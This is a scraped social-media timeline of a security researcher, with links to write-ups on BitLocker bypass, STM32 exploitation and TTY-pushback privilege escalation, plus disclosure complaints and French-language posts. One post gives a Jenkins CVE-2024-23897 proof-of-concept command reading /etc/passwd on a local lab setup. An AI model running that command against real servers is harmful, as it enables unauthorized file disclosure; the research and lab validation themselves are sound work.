gquere

Wrote an article on exploiting a partially hardened STM32H5 by using gadgets from the ROM code: errno.fr/Overflowing_ST…

Wrote an article on Privescing a BitLocker + PIN-Encrypted Company Laptop: errno.fr/Bitlocker_TPM_…

A few IDA tips to reverse engineer U-Boot: errno.fr/IDA_tips_for_r…

Cool article by PT Swarm on the history and future of DMA attacks: swarm.ptsecurity.com/new-dog-old-tr…

I wrote an article on the knowledge, time and money needed to perform a chip off attack: errno.fr/NAND_chip_off_…

@alextjensen @virullius @evilsocket Yeah except OpenBSD is also cited.

* Unauthenticated RCE vs all GNU/Linux systems (plus others) disclosed 3 weeks ago. * Full disclosure happening in less than 2 weeks (as agreed with devs). * Still no CVE assigned (there should be at least 3, possibly 4, ideally 6). * Still no working fix. * Canonical, RedHat and others have confirmed the severity, a 9.9, check screenshot. * Devs are still arguing about whether or not some of the issues have a security impact. I've spent the last 3 weeks of my sabbatical working full time on this research, reporting, coordination and so on with the sole purpose of helping and pretty much only got patronized because the devs just can't accept that their code is crap - responsible disclosure: no more.

Bruteforcing Jenkins' keys, an addendum to CVE-2024-23897: errno.fr/bruteforcing_C…

@indept01 @Dinosn No, unauthenticated users can read the first 3 lines of any file.

Validating Jenkins CVE-2024-23897, with a quick docker setup from my favorite github.com/vulhub/vulhub resources, java -jar jenkins-cli.jar -s 'http://localhost:8080' connect-node "@/etc/passwd"

@Le1aaaaa @360_learner @h4x0r_dz Unauthenticated user can read the first 3 lines.

@360_learner @h4x0r_dz Default user permissions can only read the first row of data

Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE POC #BugBounty #vulnerabilities #rce

I wrote an article on Dependency Confusions in Docker: errno.fr/DockerDependen…

Bunch of vulns I found last year in Control-M Web: errno.fr/ControlMWebAdv…

@andremoulu @hexacon_fr @Cellebrite intéressé monami courage à vous

En raison de la situation actuelle en Israël, on a quelques tickets pour @hexacon_fr en rab et @Cellebrite serait heureux de vous les offrir. Pour participer, il suffit de répondre à ce message et on sélectionnera des gagnants demain (12 octobre) dans l'après midi.

@jrozner @HockeyInJune LUKS supports these encrypted sessions. This is a BitLocker "flaw" possibly explained by the fact that it came out before TPM and changing the behaviour might cause retrocompatibility issues. Although it stays a "turtles all the way down" problem, snooping becomes harder

@_gquere @HockeyInJune It’s very possible the TPM protocol addresses this but I don’t know it to know whether it does. However, encryption alone doesn’t fix it, especially if it doesn’t include mutual authentication. 1/n

FDE has always been a checkbox. Will this research change that? errno.fr/BypassingBitlo… Everything from SEDs to TPMs can be decapped or bypassed. SecureBoot (if enabled properly) could prevent a modified OS from booting, but it won't prevent copying the unencrypted drive.

@jrozner @HockeyInJune I'm no expert but one could argue that FVEK is a more important secret than VMK since it cannot be changed without re-encrypting the whole disk. Rekeying should be done by changing the VMK. Also this would be easily solved if communications between the PCH and TPM were encrypted

@HockeyInJune At least if the VMK never leaves the TPM transport layer encryption could theoretically be added to protect the clear text key in transit and a malicious/compromised processor can't request the key

@jochenleidner It can be secure if you protect it using a passphrase, but it's rarely the case since it's more user-friendly if the disk auto-decrypts (which is the vulnerability presented here).

Forget laptop hardware encryption errno.fr/BypassingBitlo… #security #ITSEC

I wrote an article on bypassing BitLocker on a Lenovo laptop: errno.fr/BypassingBitlo…

@spendergrsec Sorry for the late reply, not here often. Thanks for your continued work, i'll update the article with the source you provided. Cheers

@_gquere Thanks for the grsec mention! The 2016 date is correct: #L891" target="_blank" rel="nofollow noopener">github.com/linux-scraping…

New article "The oldest privesc: injecting careless administrators’ terminals using TTY pushback": errno.fr/TTYPushback.ht…

@gabrielthierry La sécu informatique en france c'est une demi-douzaine de guignols qui font les plateaux et 500 mecs solides qui restent tranquillement inconnus du grand public.

Vous avez peut-être vu passer ce rocambolesque récit d'un hacker français pourchassé par la CIA. Waouh, les supers espions de Langley sur la piste d'un simple ado, c'est vraiment une belle histoire. Sauf que... Spoiler alert: ce narratif semble creux.